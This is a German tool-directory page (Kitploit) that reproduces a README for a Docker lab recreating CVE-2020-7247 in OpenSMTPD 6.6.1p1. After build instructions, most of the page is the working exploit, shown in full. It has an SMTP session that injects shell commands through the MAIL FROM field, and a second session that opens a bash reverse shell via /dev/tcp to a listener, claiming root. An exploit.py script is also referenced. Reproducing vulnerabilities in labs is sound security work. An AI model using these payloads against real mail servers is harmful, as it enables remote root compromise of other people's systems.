Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-7247-reproducer — Docker-basierte Umgebung zur Reproduktion von CVE-2020-7247 (OpenSMTPD) mit einem Python-Exploit-Skript für die Ausführung beliebiger Befehle und eine Reverse Shell über ein manipuliertes SMTP MAIL FROM-Feld. | Kitploit
Tools/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

Docker-basierte Umgebung zur Reproduktion von CVE-2020-7247 (OpenSMTPD) mit einem Python-Exploit-Skript für die Ausführung beliebiger Befehle und eine Reverse Shell über ein manipuliertes SMTP MAIL FROM-Feld.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

CVE-2020-7247 (OpenSMTPD)

Informationen

Dieses Repository enthält die notwendigen Dateien, um ein Docker-Image zu erstellen, das eine verwundbare Umgebung von OpenSMTPD (6.6.1p1) enthält. Die Schwachstelle ermöglicht es einem Angreifer, beliebige Befehle durch eine speziell präparierte SMTP-Sitzung auszuführen, insbesondere im MAIL FROM-Feld.

Verwendung

  1. Docker-Image erstellen (Debian-basiert):
root@kitploit:~
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. Nix-Image erstellen:
root@kitploit:~
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

Exploit

  1. Schwachstelle ausnutzen:

3.1. Beliebige Befehle ausführen:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;touch secret.txt;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

Hello Bonjour Xin chào
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

3.2. Reverse Shell erhalten:

Listener einrichten:

root@kitploit:~
nc -lnvp 8080

Führen Sie das exploit.py-Skript aus (in einem anderen Terminal):

root@kitploit:~
python3 exploit.py

Oder manuell ausführen:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

Sie sollten nun eine Shell als Root auf dem Host-Rechner haben.

Referenzen

  • OpenSMTPD
  • NVD
Tool herunterladen